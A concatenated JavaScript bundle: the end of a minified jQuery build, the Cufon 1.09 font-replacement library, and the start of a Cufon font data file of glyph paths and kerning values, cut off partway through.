G=this.offsetParent(),J=this.offset(),E=/^body|html$/i.test(G[0].tagName)?{top:0,left:0}:G.offset();J.top-=j(this,"marginTop");J.left-=j(this,"marginLeft");E.top+=j(G,"borderTopWidth");E.left+=j(G,"borderLeftWidth");F={top:J.top-E.top,left:J.left-E.left}}return F},offsetParent:function(){var E=this[0].offsetParent||document.body;while(E&&(!/^body|html$/i.test(E.tagName)&&o.css(E,"position")=="static")){E=E.offsetParent}return o(E)}});o.each(["Left","Top"],function(F,E){var G="scroll"+E;o.fn[G]=function(H){if(!this[0]){return null}return H!==g?this.each(function(){this==l||this==document?l.scrollTo(!F?H:o(l).scrollLeft(),F?H:o(l).scrollTop()):this[G]=H}):this[0]==l||this[0]==document?self[F?"pageYOffset":"pageXOffset"]||o.boxModel&&document.documentElement[G]||document.body[G]:this[0][G]}});o.each(["Height","Width"],function(I,G){var E=I?"Left":"Top",H=I?"Right":"Bottom",F=G.toLowerCase();o.fn["inner"+G]=function(){return this[0]?o.css(this[0],F,false,"padding"):null};o.fn["outer"+G]=function(K){return this[0]?o.css(this[0],F,false,K?"margin":"border"):null};var J=G.toLowerCase();o.fn[J]=function(K){return this[0]==l?document.compatMode=="CSS1Compat"&&document.documentElement["client"+G]||document.body["client"+G]:this[0]==document?Math.max(document.documentElement["client"+G],document.body["scroll"+G],document.documentElement["scroll"+G],document.body["offset"+G],document.documentElement["offset"+G]):K===g?(this.length?o.css(this[0],J):null):this.css(J,typeof K==="string"?K:K+"px")}})})();


/* Source File: cufon-yui.js */

/*
 * Copyright (c) 2009 Simo Kinnunen.
 * Licensed under the MIT license.
 *
 * @version 1.09
 */
var Cufon=(function(){var m=function(){return m.replace.apply(null,arguments)};var x=m.DOM={ready:(function(){var C=false,E={loaded:1,complete:1};var B=[],D=function(){if(C){return}C=true;for(var F;F=B.shift();F()){}};if(document.addEventListener){document.addEventListener("DOMContentLoaded",D,false);window.addEventListener("pageshow",D,false)}if(!window.opera&&document.readyState){(function(){E[document.readyState]?D():setTimeout(arguments.callee,10)})()}if(document.readyState&&document.createStyleSheet){(function(){try{document.body.doScroll("left");D()}catch(F){setTimeout(arguments.callee,1)}})()}q(window,"load",D);return function(F){if(!arguments.length){D()}else{C?F():B.push(F)}}})(),root:function(){return document.documentElement||document.body}};var n=m.CSS={Size:function(C,B){this.value=parseFloat(C);this.unit=String(C).match(/[a-z%]*$/)[0]||"px";this.convert=function(D){return D/B*this.value};this.convertFrom=function(D){return D/this.value*B};this.toString=function(){return this.value+this.unit}},addClass:function(C,B){var D=C.className;C.className=D+(D&&" ")+B;return C},color:j(function(C){var B={};B.color=C.replace(/^rgba\((.*?),\s*([\d.]+)\)/,function(E,D,F){B.opacity=parseFloat(F);return"rgb("+D+")"});return B}),fontStretch:j(function(B){if(typeof B=="number"){return B}if(/%$/.test(B)){return parseFloat(B)/100}return{"ultra-condensed":0.5,"extra-condensed":0.625,condensed:0.75,"semi-condensed":0.875,"semi-expanded":1.125,expanded:1.25,"extra-expanded":1.5,"ultra-expanded":2}[B]||1}),getStyle:function(C){var B=document.defaultView;if(B&&B.getComputedStyle){return new a(B.getComputedStyle(C,null))}if(C.currentStyle){return new a(C.currentStyle)}return new a(C.style)},gradient:j(function(F){var G={id:F,type:F.match(/^-([a-z]+)-gradient\(/)[1],stops:[]},C=F.substr(F.indexOf("(")).match(/([\d.]+=)?(#[a-f0-9]+|[a-z]+\(.*?\)|[a-z]+)/ig);for(var E=0,B=C.length,D;E<B;++E){D=C[E].split("=",2).reverse();G.stops.push([D[1]||E/(B-1),D[0]])}return G}),quotedList:j(function(E){var D=[],C=/\s*((["'])([\s\S]*?[^\\])\2|[^,]+)\s*/g,B;while(B=C.exec(E)){D.push(B[3]||B[1])}return D}),recognizesMedia:j(function(G){var E=document.createElement("style"),D,C,B;E.type="text/css";E.media=G;try{E.appendChild(document.createTextNode("/**/"))}catch(F){}C=g("head")[0];C.insertBefore(E,C.firstChild);D=(E.sheet||E.styleSheet);B=D&&!D.disabled;C.removeChild(E);return B}),removeClass:function(D,C){var B=RegExp("(?:^|\\s+)"+C+"(?=\\s|$)","g");D.className=D.className.replace(B,"");return D},supports:function(D,C){var B=document.createElement("span").style;if(B[D]===undefined){return false}B[D]=C;return B[D]===C},textAlign:function(E,D,B,C){if(D.get("textAlign")=="right"){if(B>0){E=" "+E}}else{if(B<C-1){E+=" "}}return E},textShadow:j(function(F){if(F=="none"){return null}var E=[],G={},B,C=0;var D=/(#[a-f0-9]+|[a-z]+\(.*?\)|[a-z]+)|(-?[\d.]+[a-z%]*)|,/ig;while(B=D.exec(F)){if(B[0]==","){E.push(G);G={};C=0}else{if(B[1]){G.color=B[1]}else{G[["offX","offY","blur"][C++]]=B[2]}}}E.push(G);return E}),textTransform:(function(){var B={uppercase:function(C){return C.toUpperCase()},lowercase:function(C){return C.toLowerCase()},capitalize:function(C){return C.replace(/\b./g,function(D){return D.toUpperCase()})}};return function(E,D){var C=B[D.get("textTransform")];return C?C(E):E}})(),whiteSpace:(function(){var D={inline:1,"inline-block":1,"run-in":1};var C=/^\s+/,B=/\s+$/;return function(H,F,G,E){if(E){if(E.nodeName.toLowerCase()=="br"){H=H.replace(C,"")}}if(D[F.get("display")]){return H}if(!G.previousSibling){H=H.replace(C,"")}if(!G.nextSibling){H=H.replace(B,"")}return H}})()};n.ready=(function(){var B=!n.recognizesMedia("all"),E=false;var D=[],H=function(){B=true;for(var K;K=D.shift();K()){}};var I=g("link"),J=g("style");function C(K){return K.disabled||G(K.sheet,K.media||"screen")}function G(M,P){if(!n.recognizesMedia(P||"all")){return true}if(!M||M.disabled){return false}try{var Q=M.cssRules,O;if(Q){search:for(var L=0,K=Q.length;O=Q[L],L<K;++L){switch(O.type){case 2:break;case 3:if(!G(O.styleSheet,O.media.mediaText)){return false}break;default:break search}}}}catch(N){}return true}function F(){if(document.createStyleSheet){return true}var L,K;for(K=0;L=I[K];++K){if(L.rel.toLowerCase()=="stylesheet"&&!C(L)){return false}}for(K=0;L=J[K];++K){if(!C(L)){return false}}return true}x.ready(function(){if(!E){E=n.getStyle(document.body).isUsable()}if(B||(E&&F())){H()}else{setTimeout(arguments.callee,10)}});return function(K){if(B){K()}else{D.push(K)}}})();function s(D){var C=this.face=D.face,B={"\u0020":1,"\u00a0":1,"\u3000":1};this.glyphs=D.glyphs;this.w=D.w;this.baseSize=parseInt(C["units-per-em"],10);this.family=C["font-family"].toLowerCase();this.weight=C["font-weight"];this.style=C["font-style"]||"normal";this.viewBox=(function(){var F=C.bbox.split(/\s+/);var E={minX:parseInt(F[0],10),minY:parseInt(F[1],10),maxX:parseInt(F[2],10),maxY:parseInt(F[3],10)};E.width=E.maxX-E.minX;E.height=E.maxY-E.minY;E.toString=function(){return[this.minX,this.minY,this.width,this.height].join(" ")};return E})();this.ascent=-parseInt(C.ascent,10);this.descent=-parseInt(C.descent,10);this.height=-this.ascent+this.descent;this.spacing=function(L,N,E){var O=this.glyphs,M,K,G,P=[],F=0,J=-1,I=-1,H;while(H=L[++J]){M=O[H]||this.missingGlyph;if(!M){continue}if(K){F-=G=K[H]||0;P[I]-=G}F+=P[++I]=~~(M.w||this.w)+N+(B[H]?E:0);K=M.k}P.total=F;return P}}function f(){var C={},B={oblique:"italic",italic:"oblique"};this.add=function(D){(C[D.style]||(C[D.style]={}))[D.weight]=D};this.get=function(H,I){var G=C[H]||C[B[H]]||C.normal||C.italic||C.oblique;if(!G){return null}I={normal:400,bold:700}[I]||parseInt(I,10);if(G[I]){return G[I]}var E={1:1,99:0}[I%100],K=[],F,D;if(E===undefined){E=I>400}if(I==500){I=400}for(var J in G){if(!k(G,J)){continue}J=parseInt(J,10);if(!F||J<F){F=J}if(!D||J>D){D=J}K.push(J)}if(I<F){I=F}if(I>D){I=D}K.sort(function(M,L){return(E?(M>=I&&L>=I)?M<L:M>L:(M<=I&&L<=I)?M>L:M<L)?-1:1});return G[K[0]]}}function r(){function D(F,G){if(F.contains){return F.contains(G)}return F.compareDocumentPosition(G)&16}function B(G){var F=G.relatedTarget;if(!F||D(this,F)){return}C(this,G.type=="mouseover")}function E(F){C(this,F.type=="mouseenter")}function C(F,G){setTimeout(function(){var H=d.get(F).options;m.replace(F,G?h(H,H.hover):H,true)},10)}this.attach=function(F){if(F.onmouseenter===undefined){q(F,"mouseover",B);q(F,"mouseout",B)}else{q(F,"mouseenter",E);q(F,"mouseleave",E)}}}function u(){var C=[],D={};function B(H){var E=[],G;for(var F=0;G=H[F];++F){E[F]=C[D[G]]}return E}this.add=function(F,E){D[F]=C.push(E)-1};this.repeat=function(){var E=arguments.length?B(arguments):C,F;for(var G=0;F=E[G++];){m.replace(F[0],F[1],true)}}}function A(){var D={},B=0;function C(E){return E.cufid||(E.cufid=++B)}this.get=function(E){var F=C(E);return D[F]||(D[F]={})}}function a(B){var D={},C={};this.extend=function(E){for(var F in E){if(k(E,F)){D[F]=E[F]}}return this};this.get=function(E){return D[E]!=undefined?D[E]:B[E]};this.getSize=function(F,E){return C[F]||(C[F]=new n.Size(this.get(F),E))};this.isUsable=function(){return !!B}}function q(C,B,D){if(C.addEventListener){C.addEventListener(B,D,false)}else{if(C.attachEvent){C.attachEvent("on"+B,function(){return D.call(C,window.event)})}}}function v(C,B){var D=d.get(C);if(D.options){return C}if(B.hover&&B.hoverables[C.nodeName.toLowerCase()]){b.attach(C)}D.options=B;return C}function j(B){var C={};return function(D){if(!k(C,D)){C[D]=B.apply(null,arguments)}return C[D]}}function c(F,E){var B=n.quotedList(E.get("fontFamily").toLowerCase()),D;for(var C=0;D=B[C];++C){if(i[D]){return i[D].get(E.get("fontStyle"),E.get("fontWeight"))}}return null}function g(B){return document.getElementsByTagName(B)}function k(C,B){return C.hasOwnProperty(B)}function h(){var C={},B,F;for(var E=0,D=arguments.length;B=arguments[E],E<D;++E){for(F in B){if(k(B,F)){C[F]=B[F]}}}return C}function o(E,M,C,N,F,D){var K=document.createDocumentFragment(),H;if(M===""){return K}var L=N.separate;var I=M.split(p[L]),B=(L=="words");if(B&&t){if(/^\s/.test(M)){I.unshift("")}if(/\s$/.test(M)){I.push("")}}for(var J=0,G=I.length;J<G;++J){H=z[N.engine](E,B?n.textAlign(I[J],C,J,G):I[J],C,N,F,D,J<G-1);if(H){K.appendChild(H)}}return K}function l(D,M){var C=D.nodeName.toLowerCase();if(M.ignore[C]){return}var E=!M.textless[C];var B=n.getStyle(v(D,M)).extend(M);var F=c(D,B),G,K,I,H,L,J;if(!F){return}for(G=D.firstChild;G;G=I){K=G.nodeType;I=G.nextSibling;if(E&&K==3){if(H){H.appendData(G.data);D.removeChild(G)}else{H=G}if(I){continue}}if(H){D.replaceChild(o(F,n.whiteSpace(H.data,B,H,J),B,M,G,D),H);H=null}if(K==1){if(G.firstChild){if(G.nodeName.toLowerCase()=="cufon"){z[M.engine](F,null,B,M,G,D)}else{arguments.callee(G,M)}}J=G}}}var t=" ".split(/\s+/).length==0;var d=new A();var b=new r();var y=new u();var e=false;var z={},i={},w={autoDetect:false,engine:null,forceHitArea:false,hover:false,hoverables:{a:true},ignore:{applet:1,canvas:1,col:1,colgroup:1,head:1,iframe:1,map:1,optgroup:1,option:1,script:1,select:1,style:1,textarea:1,title:1,pre:1},printable:true,selector:(window.Sizzle||(window.jQuery&&function(B){return jQuery(B)})||(window.dojo&&dojo.query)||(window.Ext&&Ext.query)||(window.YAHOO&&YAHOO.util&&YAHOO.util.Selector&&YAHOO.util.Selector.query)||(window.$$&&function(B){return $$(B)})||(window.$&&function(B){return $(B)})||(document.querySelectorAll&&function(B){return document.querySelectorAll(B)})||g),separate:"words",textless:{dl:1,html:1,ol:1,table:1,tbody:1,thead:1,tfoot:1,tr:1,ul:1},textShadow:"none"};var p={words:/\s/.test("\u00a0")?/[^\S\u00a0]+/:/\s+/,characters:"",none:/^/};m.now=function(){x.ready();return m};m.refresh=function(){y.repeat.apply(y,arguments);return m};m.registerEngine=function(C,B){if(!B){return m}z[C]=B;return m.set("engine",C)};m.registerFont=function(D){if(!D){return m}var B=new s(D),C=B.family;if(!i[C]){i[C]=new f()}i[C].add(B);return m.set("fontFamily",'"'+C+'"')};m.replace=function(D,C,B){C=h(w,C);if(!C.engine){return m}if(!e){n.addClass(x.root(),"cufon-active cufon-loading");n.ready(function(){n.addClass(n.removeClass(x.root(),"cufon-loading"),"cufon-ready")});e=true}if(C.hover){C.forceHitArea=true}if(C.autoDetect){delete C.fontFamily}if(typeof C.textShadow=="string"){C.textShadow=n.textShadow(C.textShadow)}if(typeof C.color=="string"&&/^-/.test(C.color)){C.textGradient=n.gradient(C.color)}else{delete C.textGradient}if(!B){y.add(D,arguments)}if(D.nodeType||typeof D=="string"){D=[D]}n.ready(function(){for(var F=0,E=D.length;F<E;++F){var G=D[F];if(typeof G=="string"){m.replace(C.selector(G),C,true)}else{l(G,C)}}});return m};m.set=function(B,C){w[B]=C;return m};return m})();Cufon.registerEngine("canvas",(function(){var b=document.createElement("canvas");if(!b||!b.getContext||!b.getContext.apply){return}b=null;var a=Cufon.CSS.supports("display","inline-block");var e=!a&&(document.compatMode=="BackCompat"||/frameset|transitional/i.test(document.doctype.publicId));var f=document.createElement("style");f.type="text/css";f.appendChild(document.createTextNode(("cufon{text-indent:0;}@media screen,projection{cufon{display:inline;display:inline-block;position:relative;vertical-align:middle;"+(e?"":"font-size:1px;line-height:1px;")+"}cufon cufontext{display:-moz-inline-box;display:inline-block;width:0;height:0;overflow:hidden;text-indent:-10000in;}"+(a?"cufon canvas{position:relative;}":"cufon canvas{position:absolute;}")+"}@media print{cufon{padding:0;}cufon canvas{display:none;}}").replace(/;/g,"!important;")));document.getElementsByTagName("head")[0].appendChild(f);function d(p,h){var n=0,m=0;var g=[],o=/([mrvxe])([^a-z]*)/g,k;generate:for(var j=0;k=o.exec(p);++j){var l=k[2].split(",");switch(k[1]){case"v":g[j]={m:"bezierCurveTo",a:[n+~~l[0],m+~~l[1],n+~~l[2],m+~~l[3],n+=~~l[4],m+=~~l[5]]};break;case"r":g[j]={m:"lineTo",a:[n+=~~l[0],m+=~~l[1]]};break;case"m":g[j]={m:"moveTo",a:[n=~~l[0],m=~~l[1]]};break;case"x":g[j]={m:"closePath"};break;case"e":break generate}h[g[j].m].apply(h,g[j].a)}return g}function c(m,k){for(var j=0,h=m.length;j<h;++j){var g=m[j];k[g.m].apply(k,g.a)}}return function(V,w,P,t,C,W){var k=(w===null);if(k){w=C.getAttribute("alt")}var A=V.viewBox;var m=P.getSize("fontSize",V.baseSize);var B=0,O=0,N=0,u=0;var z=t.textShadow,L=[];if(z){for(var U=z.length;U--;){var F=z[U];var K=m.convertFrom(parseFloat(F.offX));var I=m.convertFrom(parseFloat(F.offY));L[U]=[K,I];if(I<B){B=I}if(K>O){O=K}if(I>N){N=I}if(K<u){u=K}}}var Z=Cufon.CSS.textTransform(w,P).split("");var E=V.spacing(Z,~~m.convertFrom(parseFloat(P.get("letterSpacing"))||0),~~m.convertFrom(parseFloat(P.get("wordSpacing"))||0));if(!E.length){return null}var h=E.total;O+=A.width-E[E.length-1];u+=A.minX;var s,n;if(k){s=C;n=C.firstChild}else{s=document.createElement("cufon");s.className="cufon cufon-canvas";s.setAttribute("alt",w);n=document.createElement("canvas");s.appendChild(n);if(t.printable){var S=document.createElement("cufontext");S.appendChild(document.createTextNode(w));s.appendChild(S)}}var aa=s.style;var H=n.style;var j=m.convert(A.height);var Y=Math.ceil(j);var M=Y/j;var G=M*Cufon.CSS.fontStretch(P.get("fontStretch"));var J=h*G;var Q=Math.ceil(m.convert(J+O-u));var o=Math.ceil(m.convert(A.height-B+N));n.width=Q;n.height=o;H.width=Q+"px";H.height=o+"px";B+=A.minY;H.top=Math.round(m.convert(B-V.ascent))+"px";H.left=Math.round(m.convert(u))+"px";var r=Math.max(Math.ceil(m.convert(J)),0)+"px";if(a){aa.width=r;aa.height=m.convert(V.height)+"px"}else{aa.paddingLeft=r;aa.paddingBottom=(m.convert(V.height)-1)+"px"}var X=n.getContext("2d"),D=j/A.height;X.scale(D,D*M);X.translate(-u,-B);X.save();function T(){var x=V.glyphs,ab,l=-1,g=-1,y;X.scale(G,1);while(y=Z[++l]){var ab=x[Z[l]]||V.missingGlyph;if(!ab){continue}if(ab.d){X.beginPath();if(ab.code){c(ab.code,X)}else{ab.code=d("m"+ab.d,X)}X.fill()}X.translate(E[++g],0)}X.restore()}if(z){for(var U=z.length;U--;){var F=z[U];X.save();X.fillStyle=F.color;X.translate.apply(X,L[U]);T()}}var q=t.textGradient;if(q){var v=q.stops,p=X.createLinearGradient(0,A.minY,0,A.maxY);for(var U=0,R=v.length;U<R;++U){p.addColorStop.apply(p,v[U])}X.fillStyle=p}else{X.fillStyle=P.get("color")}T();return s}})());Cufon.registerEngine("vml",(function(){var e=document.namespaces;if(!e){return}e.add("cvml","urn:schemas-microsoft-com:vml");e=null;var b=document.createElement("cvml:shape");b.style.behavior="url(#default#VML)";if(!b.coordsize){return}b=null;var h=(document.documentMode||0)<8;document.write(('<style type="text/css">cufoncanvas{text-indent:0;}@media screen{cvml\\:shape,cvml\\:rect,cvml\\:fill,cvml\\:shadow{behavior:url(#default#VML);display:block;antialias:true;position:absolute;}cufoncanvas{position:absolute;text-align:left;}cufon{display:inline-block;position:relative;vertical-align:'+(h?"middle":"text-bottom")+";}cufon cufontext{position:absolute;left:-10000in;font-size:1px;}a cufon{cursor:pointer}}@media print{cufon cufoncanvas{display:none;}}</style>").replace(/;/g,"!important;"));function c(i,j){return a(i,/(?:em|ex|%)$|^[a-z-]+$/i.test(j)?"1em":j)}function a(l,m){if(m==="0"){return 0}if(/px$/i.test(m)){return parseFloat(m)}var k=l.style.left,j=l.runtimeStyle.left;l.runtimeStyle.left=l.currentStyle.left;l.style.left=m.replace("%","em");var i=l.style.pixelLeft;l.style.left=k;l.runtimeStyle.left=j;return i}function f(l,k,j,n){var i="computed"+n,m=k[i];if(isNaN(m)){m=k.get(n);k[i]=m=(m=="normal")?0:~~j.convertFrom(a(l,m))}return m}var g={};function d(p){var q=p.id;if(!g[q]){var n=p.stops,o=document.createElement("cvml:fill"),i=[];o.type="gradient";o.angle=180;o.focus="0";o.method="sigma";o.color=n[0][1];for(var m=1,l=n.length-1;m<l;++m){i.push(n[m][0]*100+"% "+n[m][1])}o.colors=i.join(",");o.color2=n[l][1];g[q]=o}return g[q]}return function(ac,G,Y,C,K,ad,W){var n=(G===null);if(n){G=K.alt}var I=ac.viewBox;var p=Y.computedFontSize||(Y.computedFontSize=new Cufon.CSS.Size(c(ad,Y.get("fontSize"))+"px",ac.baseSize));var y,q;if(n){y=K;q=K.firstChild}else{y=document.createElement("cufon");y.className="cufon cufon-vml";y.alt=G;q=document.createElement("cufoncanvas");y.appendChild(q);if(C.printable){var Z=document.createElement("cufontext");Z.appendChild(document.createTextNode(G));y.appendChild(Z)}if(!W){y.appendChild(document.createElement("cvml:shape"))}}var ai=y.style;var R=q.style;var l=p.convert(I.height),af=Math.ceil(l);var V=af/l;var P=V*Cufon.CSS.fontStretch(Y.get("fontStretch"));var U=I.minX,T=I.minY;R.height=af;R.top=Math.round(p.convert(T-ac.ascent));R.left=Math.round(p.convert(U));ai.height=p.convert(ac.height)+"px";var F=Y.get("color");var ag=Cufon.CSS.textTransform(G,Y).split("");var L=ac.spacing(ag,f(ad,Y,p,"letterSpacing"),f(ad,Y,p,"wordSpacing"));if(!L.length){return null}var k=L.total;var x=-U+k+(I.width-L[L.length-1]);var ah=p.convert(x*P),X=Math.round(ah);var O=x+","+I.height,m;var J="r"+O+"ns";var u=C.textGradient&&d(C.textGradient);var o=ac.glyphs,S=0;var H=C.textShadow;var ab=-1,aa=0,w;while(w=ag[++ab]){var D=o[ag[ab]]||ac.missingGlyph,v;if(!D){continue}if(n){v=q.childNodes[aa];while(v.firstChild){v.removeChild(v.firstChild)}}else{v=document.createElement("cvml:shape");q.appendChild(v)}v.stroked="f";v.coordsize=O;v.coordorigin=m=(U-S)+","+T;v.path=(D.d?"m"+D.d+"xe":"")+"m"+m+J;v.fillcolor=F;if(u){v.appendChild(u.cloneNode(false))}var ae=v.style;ae.width=X;ae.height=af;if(H){var s=H[0],r=H[1];var B=Cufon.CSS.color(s.color),z;var N=document.createElement("cvml:shadow");N.on="t";N.color=B.color;N.offset=s.offX+","+s.offY;if(r){z=Cufon.CSS.color(r.color);N.type="double";N.color2=z.color;N.offset2=r.offX+","+r.offY}N.opacity=B.opacity||(z&&z.opacity)||1;v.appendChild(N)}S+=L[aa++]}var M=v.nextSibling,t,A;if(C.forceHitArea){if(!M){M=document.createElement("cvml:rect");M.stroked="f";M.className="cufon-vml-cover";t=document.createElement("cvml:fill");t.opacity=0;M.appendChild(t);q.appendChild(M)}A=M.style;A.width=X;A.height=af}else{if(M){q.removeChild(M)}}ai.width=Math.max(Math.ceil(p.convert(k*P)),0);if(h){var Q=Y.computedYAdjust;if(Q===undefined){var E=Y.get("lineHeight");if(E=="normal"){E="1em"}else{if(!isNaN(E)){E+="em"}}Y.computedYAdjust=Q=0.5*(a(ad,E)-parseFloat(ai.height))}if(Q){ai.marginTop=Math.ceil(Q)+"px";ai.marginBottom=Q+"px"}}return y}})());


/* Source File: tfardent.font.js */

/*!
 * The following copyright notice may not be removed under any circumstances.
 * 
 * Copyright:
 * Copr.1991-93, Joseph Treacy. V.12, completed 1.5.93. Glyphs,dataCopr.TF. All
 * world rights reserved.
 */
Cufon.registerFont((function(f){var b=_cufon_bridge_={p:[{"d":"78,9r-18,0r-68,-285r19,0","w":77},{"d":"150,-163v1,-15,-14,-15,-29,-14r0,-8v17,-3,35,-15,52,-12r0,152v-1,33,10,35,30,30r3,6v0,0,-16,12,-32,12v-20,0,-23,-19,-23,-19v0,0,-25,19,-60,19v-87,0,-61,-92,-61,-166v0,-14,-14,-15,-29,-14r0,-8v17,-3,35,-15,52,-12r0,136v0,33,11,50,48,50v24,0,49,-17,49,-17r0,-135","w":200,"k":{"z":-5,"n":-7,"m":-7,"c":-5,"\/":-24}},{"d":"31,-234v0,-13,-15,-15,-30,-14r0,-6v17,-3,37,-18,53,-13r0,151r77,-65v1,-2,-22,1,-18,-9r71,0r0,6v-42,7,-73,44,-107,63r75,80v29,30,37,34,50,34r0,7r-73,0r0,-7v6,0,12,-2,12,-7v-17,-35,-57,-65,-81,-95r-6,5v3,38,-13,98,25,97r0,7r-74,0r0,-7v13,1,26,-12,26,-26r0,-201","w":180,"k":{"z":-7,"y":-7,"x":-12,"u":-3,"t":-5,"s":-5,"r":-10,"q":7,"p":-7,"o":7,"n":-14,"m":-12,"j":-7,"i":-10,"f":-7,"e":7,"a":-5,";":-22,":":-22,"\/":-41,".":-26,"-":24,",":-26,"!":-14}},{"d":"51,-13v0,9,-8,16,-18,16v-11,0,-18,-7,-18,-16v0,-9,8,-17,17,-17v11,0,19,7,19,17","w":67,"k":{"1":29,"'":72,"\"":77}},{"d":"65,-242v0,9,-9,16,-18,16v-21,1,-21,-32,-1,-32v10,0,19,6,19,16xm59,-33v-1,14,13,27,26,26r0,7r-75,0r0,-7v12,1,26,-11,26,-26r0,-130v1,-15,-14,-15,-29,-14r0,-7v17,-3,35,-16,52,-13r0,164","w":92,"k":{"z":3,"y":10,"x":10,"w":10,"v":7,"t":10,"s":7,"o":7,"j":-5,"g":7,"f":7,"e":5,"b":7,"a":5}},{"d":"154,-181v-3,-29,15,-74,-29,-67r0,-6v17,-3,37,-18,52,-13r0,226v1,35,13,29,30,26r3,6v0,0,-17,12,-33,12v-20,0,-23,-19,-23,-19v0,0,-22,19,-54,19v-48,0,-88,-20,-88,-101v0,-77,40,-101,88,-101v37,0,54,18,54,18xm153,-32r0,-126v0,0,-17,-30,-53,-30v-34,0,-62,19,-62,90v0,62,28,88,62,88v32,0,53,-22,53,-22","w":209,"k":{"y":7,"w":7,"v":7,"u":5,"t":5,"q":7,"o":7,"e":7,"\/":-19}},{"d":"93,-7v43,1,24,-66,28,-107r-72,-117v-11,-17,-22,-27,-44,-27r0,-7r84,0r0,7v-21,1,-14,17,-8,27r60,100v21,-39,48,-75,65,-117v0,-8,-6,-10,-13,-10r0,-7r68,0r0,7v-21,0,-34,10,-44,27r-70,115v4,41,-16,109,27,109r0,7r-81,0r0,-7","w":258,"k":{"z":36,"y":22,"w":31,"v":24,"u":26,"t":24,"s":43,"r":29,"p":26,"o":58,"i":14,"g":58,"e":58,"d":43,"a":48,"Z":10,"Y":7,"X":7,"W":7,"V":7,"U":7,"S":17,"Q":28,"O":25,"G":29,"C":26,"A":43,";":39,":":39,"\/":14,".":39,"-":58,",":41}},{"d":"233,-183r-4,13r-60,0r-13,59r59,0r-3,12r-59,0r-27,113r-13,0r27,-113r-60,0r-27,113r-13,0r27,-113r-59,0r3,-12r59,0r14,-59r-58,0r2,-13r59,0r24,-100r12,0r-23,100r59,0r24,-100r13,0r-24,100r61,0xm157,-170r-60,0r-14,59r60,0","w":239,"k":{"1":31}},{"d":"111,-125v0,110,-40,156,-88,156r0,-7v33,0,62,-50,62,-149v0,-99,-29,-150,-62,-150r0,-7v48,0,88,52,88,157","w":126},{"d":"209,0r-201,0r0,-7r160,-246r-67,0v-62,0,-73,8,-73,43r-9,0r0,-55r182,0r0,7r-159,246v65,-4,170,20,158,-53r9,0r0,65","w":211,"k":{"y":5,"a":-7,"U":5,"T":-5,"S":-5,"Q":5,"O":5,"G":5,"C":5,"A":7,"\/":-19,".":-7,"-":12}},{"d":"83,-271v-2,10,41,40,51,38r0,8v-16,-3,-52,-14,-60,-19v1,-11,-5,-29,9,-27","w":207},{"d":"47,20r-15,0r0,-300r15,0r0,300","w":84},{"d":"57,-33v-1,14,13,27,26,26r0,7r-74,0r0,-7v12,1,25,-11,25,-26r0,-201v1,-14,-14,-15,-29,-14r0,-6r48,-16r4,3r0,234","w":90,"k":{"z":7,"y":10,"x":7,"w":10,"v":5,"u":5,"t":10,"s":10,"r":10,"q":7,"p":5,"o":7,"l":-10,"i":-3,"g":7,"f":7,"e":7,"a":5}},{"d":"78,-116v-8,0,-18,1,-18,10r0,109v2,43,-20,44,-52,41r0,-7v24,0,29,-10,29,-39r0,-98v0,-9,7,-18,16,-18r0,-3v-9,0,-16,-8,-16,-16r0,-100v0,-29,-5,-38,-29,-38r0,-8v35,-1,52,-1,52,42r0,109v0,9,10,9,18,9r0,7","w":92},{"d":"258,45r-37,0r-35,-48v-91,22,-167,3,-168,-129v0,-105,54,-138,119,-138v66,0,120,28,120,138v0,63,-19,100,-49,119xm228,-132v0,-99,-41,-127,-91,-127v-49,0,-90,28,-90,127v0,119,55,140,130,118r-40,-55r21,0r38,42v20,-18,32,-50,32,-105","w":272,"k":{"A":24,"\/":-5}},{"d":"195,-132v0,105,-42,137,-90,137v-48,0,-91,-27,-91,-137v0,-105,43,-138,91,-138v48,0,90,28,90,138xm166,-132v0,-99,-28,-127,-61,-127v-34,0,-62,28,-62,127v0,99,28,126,62,126v33,0,61,-27,61,-126","k":{"9":1,"8":10,"7":32,"5":14,"4":5,"3":22,"2":22,"1":46,"\/":3,",":7}},{"d":"265,-258v-13,0,-28,9,-42,50r-72,208r-29,0r-71,-208v-11,-31,-21,-50,-43,-50r0,-7r83,0r0,7v-26,0,-18,31,-11,50r62,187v22,-73,52,-143,68,-221v0,-10,-10,-16,-21,-16r0,-7r76,0r0,7","w":264,"k":{"z":19,"y":22,"v":22,"u":22,"t":24,"s":39,"r":23,"p":14,"o":46,"m":14,"i":10,"g":41,"e":46,"a":41,"Z":7,"W":-5,"S":10,"Q":19,"O":19,"G":18,"C":18,"A":46,";":19,":":17,"\/":12,".":43,"-":41,",":43}},{"d":"378,-258v-21,0,-33,9,-45,50r-61,208r-31,0r-53,-216r-48,216r-33,0r-61,-208v-9,-32,-21,-50,-43,-50r0,-7r84,0r0,7v-27,1,-18,27,-12,50r53,187r53,-237r26,0r55,237r52,-187v7,-20,11,-49,-8,-50r0,-7r72,0r0,7","w":380,"k":{"y":19,"u":24,"t":19,"s":36,"r":29,"p":22,"o":39,"n":22,"m":26,"l":5,"k":7,"i":14,"h":7,"e":39,"d":31,"a":39,"Z":12,"U":19,"S":14,"Q":22,"O":23,"G":23,"C":23,"A":43,";":22,":":14,"\/":29,".":50,"-":32,",":50}},{"d":"154,-66v-17,-85,-134,-45,-134,-134v0,-50,39,-70,84,-70v39,0,60,6,60,6r0,45r-9,0v0,-27,-17,-40,-53,-40v-34,0,-57,16,-57,46v0,40,40,51,60,59v39,15,77,35,77,85v0,48,-38,73,-93,73v-52,0,-79,-18,-79,-18r0,-45r9,0v0,20,16,52,70,52v34,0,65,-16,65,-59","w":186,"k":{"z":5,"y":19,"x":7,"w":14,"v":10,"u":5,"t":7,"s":5,"r":5,"q":5,"p":7,"c":-7,"Z":5,"Y":18,"X":7,"W":13,"V":15,"U":5,"S":-3,"R":5,"N":5,"M":5,"A":19,"\/":-12}},{"w":104},{"d":"175,-33v0,15,13,27,26,26r0,7r-75,0r0,-7v44,-3,26,-80,26,-125v0,-39,-15,-54,-43,-54v-80,0,-49,83,-55,153v-2,15,13,27,25,26r0,7r-74,0r0,-7v13,1,26,-12,26,-26r0,-201v0,-13,-15,-15,-30,-14r0,-6v17,-3,37,-18,53,-13r0,97v0,0,19,-29,57,-29v85,0,64,92,64,166","w":199,"k":{"z":3,"y":10,"x":7,"w":12,"v":10,"t":5,"f":12,"e":3,"b":5,"a":3,"\/":-12}},{"d":"183,65r-183,0r0,-12r183,0r0,12","w":181},{"d":"78,-276r-71,300r-17,0r71,-300r17,0","w":78,"k":{"z":14,"x":7,"u":-10,"s":12,"q":19,"o":19,"k":-14,"h":-10,"Z":-12,"Y":-12,"X":-24,"W":-10,"V":-12,"U":-14,"T":